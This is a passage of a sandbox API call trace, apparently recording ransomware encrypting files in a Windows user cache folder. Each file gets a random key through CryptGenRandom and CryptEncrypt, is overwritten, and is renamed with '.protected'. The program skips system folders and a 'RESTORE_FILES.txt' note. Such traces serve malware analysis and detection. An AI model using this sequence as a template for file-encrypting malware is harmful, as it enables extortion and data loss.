(lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".txt") returned 0x0 [0088.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 151 [0088.814] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".rar") returned 0x0 [0088.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 151 [0088.814] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".zip") returned 0x0 [0088.814] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ae, lpOverlapped=0x0) returned 1 [0088.817] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.817] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ae, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ae, lpOverlapped=0x0) returned 1 [0088.817] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.818] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.818] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.818] CloseHandle (hObject=0x150) returned 1 [0088.818] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.protected") returned 161 [0088.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.protected")) returned 1 [0088.819] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Windows") returned -1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Program Files") returned -1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Program Files (x86)") returned -1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="$Recycle.bin") returned 1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="System Volume Information") returned -1 [0088.819] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 151 [0088.819] StrStrIW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".protected") returned 0x0 [0088.819] lstrcmpW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="RESTORE_FILES.txt") returned -1 [0088.819] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.819] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.820] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 151 [0088.820] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".txt") returned 0x0 [0088.820] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 151 [0088.820] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".rar") returned 0x0 [0088.820] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 151 [0088.820] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".zip") returned 0x0 [0088.820] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ae, lpOverlapped=0x0) returned 1 [0088.837] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.837] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ae, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ae, lpOverlapped=0x0) returned 1 [0088.837] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.838] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.838] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.838] CloseHandle (hObject=0x150) returned 1 [0088.838] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.protected") returned 161 [0088.838] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.protected")) returned 1 [0088.839] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Windows") returned -1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Program Files") returned -1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Program Files (x86)") returned -1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="$Recycle.bin") returned 1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="System Volume Information") returned -1 [0088.839] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 151 [0088.839] StrStrIW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".protected") returned 0x0 [0088.839] lstrcmpW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="RESTORE_FILES.txt") returned -1 [0088.839] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.839] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 151 [0088.840] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".txt") returned 0x0 [0088.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 151 [0088.840] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".rar") returned 0x0 [0088.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 151 [0088.840] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".zip") returned 0x0 [0088.840] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x663, lpOverlapped=0x0) returned 1 [0088.883] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff99d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.883] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x663, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x663, lpOverlapped=0x0) returned 1 [0088.883] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.883] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.883] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.883] CloseHandle (hObject=0x150) returned 1 [0088.883] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.protected") returned 161 [0088.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.protected")) returned 1 [0088.884] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Windows") returned -1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Program Files") returned -1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Program Files (x86)") returned -1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="$Recycle.bin") returned 1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="System Volume Information") returned -1 [0088.885] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 151 [0088.885] StrStrIW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".protected") returned 0x0 [0088.885] lstrcmpW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="RESTORE_FILES.txt") returned -1 [0088.885] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.885] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 151 [0088.886] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".txt") returned 0x0 [0088.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 151 [0088.886] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".rar") returned 0x0 [0088.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 151 [0088.886] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".zip") returned 0x0 [0088.886] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x64b, lpOverlapped=0x0) returned 1 [0088.903] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9b5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.903] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x64b, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x64b, lpOverlapped=0x0) returned 1 [0088.904] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.904] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.904] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.904] CloseHandle (hObject=0x150) returned 1 [0088.904] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.protected") returned 161 [0088.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.protected")) returned 1 [0088.905] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Windows") returned -1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Program Files") returned -1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Program Files (x86)") returned -1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="$Recycle.bin") returned 1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="System Volume Information") returned -1 [0088.905] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 151 [0088.905] StrStrIW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".protected") returned 0x0 [0088.905] lstrcmpW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="RESTORE_FILES.txt") returned -1 [0088.905] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.905] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 151 [0088.906] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".txt") returned 0x0 [0088.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 151 [0088.906] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".rar") returned 0x0 [0088.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 151 [0088.906] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".zip") returned 0x0 [0088.906] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x64c, lpOverlapped=0x0) returned 1 [0088.916] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.916] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x64c, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x64c, lpOverlapped=0x0) returned 1 [0088.916] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.916] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 